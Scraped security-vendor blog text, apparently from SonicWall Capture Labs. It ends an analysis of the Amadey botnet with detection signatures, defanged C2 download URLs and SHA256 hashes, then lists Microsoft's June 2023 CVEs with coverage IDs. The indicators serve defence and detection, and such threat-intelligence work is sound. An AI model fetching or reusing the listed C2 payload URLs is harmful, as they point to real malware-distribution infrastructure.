Fig 5: Pseudocode of string decoding algorithm

DECODED STRINGS

Fig 6: Some of Decoded strings

CONCLUSION

Amadey is a botnet developed in C++ whose main objective is to steal victims’ sensitive information. Amadey can inject modules received from the CnC, which also makes it a downloader. The malware uses a custom decoding algorithm to hide its strings.

 

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: MalAgent.OLA_2 (Trojan)

This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.

IOCs:

C2

hxxp://77[.]91[.]68[.]30/DSC01491/foto124[.]exe

hxxp://77[.]91[.]68[.]30/DSC01491/fotod25[.]exe

hxxp://77[.]91[.]68[.]30/music/rock/Plugins/clip64[.]dll

hxxp://77[.]91[.]68[.]30/music/rock/Plugins/cred32[.]dll

 

SHA256

dcda87129c5d1687d208553663943bde1fb19ca3942fccf99da672d4f6cb3fea -> Amadey Malware

5cfeac2fad035a1a351abd2d5734dcb858583fdbdb9cf7f9383f5c809593fe96 -> foto125.exe

a2f989a5f3fcfef29366f7f469c39636dc3505da5ad44953cdd58829813c1d6f -> foto124.exe

340c8464c2007ce3f80682e15dfafa4180b641d53c14201b929906b7b0284d87 -> cred64.dll

Microsoft Security Bulletin Coverage for June 2023

SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of June 2023. A list of issues reported, along with SonicWall coverage information, is as follows:

CVE-2023-28310 Microsoft Exchange Server Remote Code Execution Vulnerability
ASPY 452 : Malformed-xml xml.MP_7

CVE-2023-29357 Microsoft SharePoint Server Elevation of Privilege Vulnerability
IPS 3917 : Microsoft SharePoint Server Elevation of Privilege (CVE-2023-29357)

CVE-2023-29358 Windows GDI Elevation of Privilege Vulnerability
ASPY 453 : Exploit-exe exe.MP_326

CVE-2023-29360 Windows TPM Device Driver Elevation of Privilege Vulnerability
ASPY 454 : Exploit-exe exe.MP_327

CVE-2023-29361 Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability
ASPY 455 : Exploit-exe exe.MP_328

CVE-2023-29371 Windows GDI Elevation of Privilege Vulnerability
ASPY 456 : Exploit-exe exe.MP_329

The following vulnerabilities do not have exploits in the wild:
CVE-2023-21565 Azure DevOps Server Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2023-21569 Azure DevOps Server Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2023-24895 .NET, .NET Framework, and Visual Studio Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-24896 Dynamics Finance and Operations Cross-site Scripting Vulnerability
There are no known exploits in the wild.
CVE-2023-24897 .NET, .NET Framework, and Visual Studio Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-24936 .NET, .NET Framework, and Visual Studio Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-24937 Windows CryptoAPI Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-24938 Windows CryptoAPI Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-29326 .NET Framework Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-29331 .NET, .NET Framework, and Visual Studio Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-29337 NuGet Client Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-29346 NTFS Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-29351 Windows Group Policy Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-29352 Windows Remote Desktop Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2023-29353 Sysinternals Process Monitor for Windows Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-29355 DHCP Server Service Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-29359 GDI Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-29362 Remote Desktop Client Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-29363 Windows Pragmatic General Multicast (PGM) Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-29364 Windows Authentication Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-29365 Windows Media Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-29366 Windows Geolocation Service Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-29367 iSCSI Target WMI Provider Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-29368 Windows Filtering Platform Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-29369 Remote Procedure Call Runtime Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-29370 Windows Media Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-29372 Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-29373 Microsoft ODBC Driver Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-32008 Windows Resilient File System (ReFS) Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-32009 Windows Collaborative Translation Framework Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-32010 Windows Bus Filter Driver Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-32011 Windows iSCSI Discovery Service Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-32012 Windows Container Manager Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-32013 Windows Hyper-V Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-32014 Windows Pragmatic General Multicast (PGM) Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-32015 Windows Pragmatic General Multicast (PGM) Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-32016 Windows Installer Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-32017 Microsoft PostScript Printer Driver Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-32018 Windows Hello Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-32019 Windows Kernel Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-32020 Windows DNS Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2023-32021 Windows SMB Witness Service Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2023-32022 Windows Server Service Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2023-32024 Microsoft Power Apps Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2023-32029 Microsoft Excel Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-32030 .NET and Visual Studio Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-32031 Microsoft Exchange Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-32032 .NET and Visual Studio Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-33126 .NET and Visual Studio Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-33128 .NET and Visual Studio Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-33129 Microsoft SharePoint Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-33130 Microsoft SharePoint Server Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2023-33131 Microsoft Outlook Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-33132 Microsoft SharePoint Server Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2023-33133 Microsoft Excel Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-33135 .NET and Visual Studio Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-33137 Microsoft Excel Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-33139 Visual Studio Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-33140 Microsoft OneNote Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2023-33141 Yet Another Reverse Proxy (YARP) Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-33142 Microsoft SharePoint Server Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-33144 Visual Studio Code Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2023-33146 Microsoft Office Remote Code Execution Vulnerability
There are no known exploits in the wild.